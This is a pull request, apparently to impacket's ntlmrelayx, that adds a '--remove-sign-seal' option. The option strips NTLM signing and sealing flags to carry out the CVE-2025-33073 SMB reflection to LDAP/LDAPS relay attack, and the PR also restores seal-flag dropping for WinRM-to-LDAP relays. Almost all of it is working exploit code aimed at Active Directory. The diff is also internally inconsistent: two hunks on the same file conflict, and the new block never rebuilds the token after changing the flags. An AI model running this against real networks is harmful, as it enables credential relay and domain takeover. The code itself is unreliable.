### PR TITLE
ntlmrelayx: NTLM SEAL flag drop paths for CVE-2025-33073 and --remove-mic

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -206,7 +206,7 @@ def start_servers(options, threads):
         c.setSMBChallenge(options.ntlmchallenge)
         c.setSMBRPCAttack(options.rpc_attack)
         c.setInterfaceIp(options.interface_ip)
-        c.setExploitOptions(options.remove_mic, options.remove_target)
+        c.setExploitOptions(options.remove_mic, options.remove_target, options.remove_sign_seal)
         c.setWebDAVOptions(options.serve_image)
         c.setIsADCSAttack(options.adcs)
         c.setADCSOptions(options.template)
@@ -345,6 +345,7 @@ if __name__ == '__main__':
                                                                    'before serving a WPAD file. (default=1)')
     parser.add_argument('-6','--ipv6', action='store_true',help='Listen on IPv6')
     parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
+    parser.add_argument('--remove-sign-seal', action='store_true', help='Remove SIGN/SEAL-related NTLM negotiate flags (exploit CVE-2025-33073)')
     parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')
     parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
                         'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'

--- a/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
@@ -156,6 +156,7 @@ class LDAPRelayClient(ProtocolClient):
                 authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
             if authMessage['flags'] & NTLMSSP_NEGOTIATE_SEAL == NTLMSSP_NEGOTIATE_SEAL:
                 authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SEAL
+            token = authMessage.getData()
 
         with self.session.connection_lock:
             self.authenticateMessageBlob = token

--- a/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
@@ -143,13 +143,19 @@ class LDAPRelayClient(ProtocolClient):
                 authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
             if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
                 authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
-            if authMessage['flags'] & NTLMSSP_NEGOTIATE_SEAL == NTLMSSP_NEGOTIATE_SEAL:
-                authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SEAL
             authMessage['MIC'] = b''
             authMessage['MICLen'] = 0
             authMessage['Version'] = b''
             authMessage['VersionLen'] = 0
             token = authMessage.getData()
+
+        if self.serverConfig.remove_sign_seal:
+            if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
+                authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
+            if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
+                authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
+            if authMessage['flags'] & NTLMSSP_NEGOTIATE_SEAL == NTLMSSP_NEGOTIATE_SEAL:
+                authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SEAL
 
         with self.session.connection_lock:
             self.authenticateMessageBlob = token

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -45,6 +45,7 @@ class NTLMRelayxConfig:
         self.encoding = None
         self.ipv6 = False
         self.remove_mic = False
+        self.remove_sign_seal = False
         self.disableMulti = False
         self.keepRelaying = False
 
@@ -240,9 +241,10 @@ class NTLMRelayxConfig:
         self.wpad_host = wpad_host
         self.wpad_auth_num = wpad_auth_num
 
-    def setExploitOptions(self, remove_mic, remove_target):
+    def setExploitOptions(self, remove_mic, remove_target, remove_sign_seal=False):
         self.remove_mic = remove_mic
         self.remove_target = remove_target
+        self.remove_sign_seal = remove_sign_seal
 
     def setWebDAVOptions(self, serve_image):
         self.serve_image = serve_image


### PR DESCRIPTION
This PR adds a new `--remove-sign-seal` flag that strips NTLMSSP `SIGN` / `ALWAYS_SIGN` / `SEAL` in the Negotiate stage to support the **CVE-2025-33073 SMB reflection -> LDAP/LDAPS relay path** (especially SMB2->LDAPS), as described in this post: https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/#P7.


It also reintroduces `SEAL` dropping in the `--remove-mic` sendAuth path (originally introduced in #2089 by [AndreySolod](https://github.com/AndreySolod))
 to allow **WinRM->LDAP** relaying in certain scenarios.